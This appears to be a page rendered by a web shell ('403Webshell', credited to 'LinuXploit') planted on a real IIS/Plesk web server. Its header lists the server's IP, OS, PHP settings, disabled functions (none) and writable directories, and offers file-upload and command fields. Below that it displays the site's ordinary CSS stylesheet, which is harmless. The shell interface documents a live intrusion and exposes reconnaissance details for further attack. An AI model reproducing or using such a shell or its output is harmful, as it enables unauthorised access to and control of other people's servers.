403Webshell
Server IP : 103.118.17.23  /  Your IP : 216.73.216.188
Web Server : Microsoft-IIS/10.0
System : Windows NT RESELLERPLESK22 10.0 build 20348 (Windows Server 2016) AMD64
User : IWAM_plesk(default) ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/vhosts/mesa.org.in/httpdocs/assets/_core/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/vhosts/mesa.org.in/httpdocs/assets/_core/css/styles.css
/*@import url('http://fonts.googleapis.com/css?family=Brawler|Titillium+Web:400,700');*/
@font-face {
  font-family: 'Brawler';
  font-style: normal;
  font-weight: 400;
  src: url(../fonts/Brawler.eot);
  src: local('Brawler'), url(../fonts/Brawler.eot) format('embedded-opentype'), url(../fonts/Brawler.woff) format('woff');
}
@font-face {
  font-family: 'Titillium Web';
  font-style: normal;
  font-weight: 400;
  src: url('../fonts/Titillium+Web.eot');
  src: local('Titillium Web'), local('TitilliumWeb-Regular'), url('../fonts/Titillium+Web.eot') format('embedded-opentype'), url('../fonts/Titillium+Web.woff') format('woff');
}
@font-face {
  font-family: 'Titillium Web';
  font-style: normal;
  font-weight: 700;
  src: url('../fonts/Titillium+WebBold.eot');
  src: local('Titillium WebBold'), local('TitilliumWeb-Bold'), url('../fonts/Titillium+WebBold.eot') format('embedded-opentype'), url('../fonts/Titillium+WebBold.woff') format('woff');
}
/* Basic elements */
body { 
    color: #333; 
    font-family: 'Titillium Web', sans-serif; 
    font-size: 1em; 
    line-height: 1.22; 
    margin:0; 
    padding: 0; 
    background-color: #2ec8a6;
}
/*//a, a:visited, a:link { color: #780000; }
//a:hover, a:active { color: #d90d0d; }*/
button { cursor: pointer; }

h1 { font-family: 'Brawler', serif; font-weight: 400; }
h2, h3, h4, h5, h6 { font-weight: 700; }

.newhead{
    color: #356BA1;
    font-size: 25px;
    font-weight: 100;
    padding-bottom: 0px;
    border-bottom: 1px solid #d5d5d5;
}

form { margin:0; padding: 0; position: relative; }

input[type=text],
input[type=password],
textarea,
select { border: 1px solid #ccc; border-radius: 3px; padding: 5px; width: 70%; }

textarea:focus,
input:focus,
select:focus { border: 1px solid #333; box-shadow: 0 0 5px #dedede; outline: 0; }

textarea:disabled,
input:disabled,
select:disabled { border: 1px solid #dedede; color: #dedede; font-style: italic; }

section { padding: 10px; }
footer { background: #333; color: #fff; padding: 10px; }

pre code { background: #f6f6f6; border: 1px solid #dedede; border-radius: 3px; display: block; padding: 10px; margin:10px auto; white-space: pre-wrap; }

#fromtab{
    border: 1px #CCCCCC solid; border-right: 1px #CCCCCC solid; 
    padding:5px; width: 120px;
    float: left; text-align: center; font-size: 12px;
}

#logo { float: left; height: 30px; }
#tagline a { color: #fff; font-weight: 700; line-height: 30px; margin-left: 10px; text-decoration: none; }

/* Fieldset */
fieldset {
	border: 1px solid #DFDFDF;
	padding: 5px;
	margin-right: 20px;
}

legend {
	border: 1px solid #DFDFDF;
	padding: 5px;
	margin-right: 20px;
	color: #000000;
	background-color: #FFF
}
#rotateall{
-ms-transform: rotate(-90deg); /* IE 9 */
    -webkit-transform: rotate(-90deg); /* Chrome, Safari, Opera */
    transform: rotate(-90deg);
}

/* QControls */
.datagrid { 
  margin: auto; 
  width: 100%; background: none repeat scroll 0 0 #fff;
  border: 1px solid #CDCDCD;
  clear: both;
  padding: 10px;
  margin-bottom: 16px;
  position: relative;
  -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
.datagrid th { background: #f6f6f6; color: #333; padding: 5px; }
.datagrid th span { float: left; margin-right: 5px; }

.datagrid th a { color: #333; text-decoration: none; text-transform: uppercase; }
.datagrid th a:hover { text-decoration: underline; }

.datagrid th.rotate > div {
  -webkit-writing-mode:vertical-rl; 
  -ms-writing-mode:tb-rl; 
   writing-mode:vertical-rl;
   height: 250px;
   width: 100px;
}

.datagrid td { border-bottom:1px solid #dedede; padding: 5px; }

.datagrid caption { overflow: hidden; position: relative; }
.datagrid .paginator-control { float: none; }
.datagrid .paginator-results { float: left; }
.paginator .arrow { color: #dedede; font-style: italic; }
.paginator .arrow a { font-style: normal; }
.paginator .break { color: #dedede; padding: 5px; }
.paginator .page { color: #dedede; display: inline-block; padding: 0 5px; }
.paginator .selected { background: #780000; border:1px solid #d90d0d; border-radius: 3px; display: inline-block; color: #fff; padding: 0 5px; }

/* Form fields */
.renderWithName { padding: 5px 0; overflow: hidden; position: relative; }
.required { color: red; }
.form-field input,
.form-field textarea { width: 100%; }
.form-field select { width: 100%; }
.form-actions { background: #f4f4f4; padding: 10px; margin: 10px -10px -10px -10px; border-top: 1px solid #CDCDCD; }
.form-save,
.form-cancel,
.form-delete{ display: inline; }
.form-delete button { font-weight: 700; }

/* To change form label/field layout, swap the comment here */
.form-name { padding: 5px 15px 5px 0; text-align: right; float: left; width: 20%; }
.form-field { width: 70%; float: left; }


.form-delete { padding-left: 20px; float: right; }
/*
.form-name { float: left; padding-right: 10px; text-align: right; width: 33%; }
.form-field { float: left; width: 50%; }
.form-save { padding-left: 33%; }
.form-delete { padding-left: 6%; }
*/

/* Status coloring */
.warning, .error { color: #d90d0d; }
.success { color: green; }

.link-list li { margin-top: 7px; }

.form-controls{
  background: none repeat scroll 0 0 #fff;
  border: 1px solid #CDCDCD;
  clear: both;
  padding: 10px;
  margin-bottom: 16px;
  position: relative;
  -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}

.clear{
    clear: both;
}

.slideup{
    margin-top: -50px;
}

a.mytooltip {outline:none; }
a.mytooltip strong {line-height:30px;}
a.mytooltip:hover {text-decoration:none;} 
a.mytooltip span {
    z-index:10;display:none; 
    margin-top:-10px; margin-left:50px;
    width:auto; line-height:16px;
}
a.mytooltip:hover span{
    display:inline; position:absolute; color:#111; padding: 10px 10px 10px 10px; text-shadow: none;
    border:1px solid #DCA; background:#fffAF0;}
.callout {z-index:20;position:absolute;border:0;left:-12px;}
    
/*CSS3 extras*/
a.mytooltip span
{
    border-radius:4px;
    box-shadow: 5px 5px 8px #CCC;
}

.margin-left-normal {
    margin-left: 10px;
}

.margin-left-medium {
    margin-left: 50px;
}

.margin-left-large {
    margin-left: 140px;
}

.margin-right-normal {
    margin-right: 10px;
}

.margin-right-medium {
    margin-right: 50px;
}

.margin-right-large {
    margin-right: 100px;
}

.margin-top-normal {
    margin-top: 10px;
}

.margin-top-medium {
    margin-top: 50px;
}

.margin-top-large {
    margin-top: 100px;
}

.margin-bottom-normal {
    margin-bottom: 10px;
}

.margin-bottom-medium {
    margin-bottom: 50px;
}

.margin-bottom-large {
    margin-bottom: 100px;
}

.btn-redlink{
    font-weight: normal;
    color: #FF0000;
    border-radius: 0;
}
.qutor_page{
    position:fixed;
    width: 40%;
    bottom: -16px;  
    right: 0px; 
    z-index: 9999;
    border-top-left-radius: 10px;
    -webkit-box-shadow: 6px 12px 44px -1px rgba(5,5,5,0.0);
    -moz-box-shadow: 6px 12px 44px -1px rgba(5,5,5,0.42);
    box-shadow: 6px 12px 44px -1px rgba(5,5,5,0.42);
}
.heading_new{
   font-family: 'Brawler', serif;
   font-weight: 400;
   font-size: 25px;
   color:#005599;
   text-decoration: underline red;
   text-decoration-style: solid;
}

.roles{
	color: #fe5722;
    padding: 0px 20px;
    border-bottom: 1px solid #ccc;
    text-align: right;
    height: 22px;
}


Youez - 2016 - github.com/yon3zu
LinuXploit